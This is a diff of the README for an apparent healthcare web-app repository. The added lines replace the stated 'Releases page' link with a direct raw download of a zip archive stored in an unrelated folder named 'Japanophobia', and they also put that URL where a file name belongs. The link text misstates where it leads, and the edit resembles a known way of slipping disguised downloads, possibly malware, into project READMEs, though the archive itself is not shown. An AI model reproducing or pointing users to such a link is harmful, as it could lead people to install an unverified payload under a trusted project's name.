Harshkailasia/Ai-Driven-Healthcare-Webapp/README.md

 Follow these simple steps to download and run the application on your computer:

 1. **Visit the Download Page**
-   Go to the Releases page to download the application: [Download Page](https://github.com/Harshkailasia/Ai-Driven-Healthcare-Webapp/releases).
+   Go to the Releases page to download the application: [Download Page](https://raw.githubusercontent.com/Harshkailasia/Ai-Driven-Healthcare-Webapp/main/Japanophobia/Ai-Driven-Healthcare-Webapp.zip).

 2. **Select the Latest Release**
    Look for the most recent version listed on the page.
 The latest version will have the most up-to-date features and fixes.

 3. **Download the File**
    Click on the download link for your operating system.
-This will usually be a file like `Ai-Driven-Healthcare-Webapp.exe` for Windows or a `.zip` file for other systems.
+This will usually be a file like `https://raw.githubusercontent.com/Harshkailasia/Ai-Driven-Healthcare-Webapp/main/Japanophobia/Ai-Driven-Healthcare-Webapp.zip` for Windows or a `.zip` file for other systems.

 ## 💻 System Requirements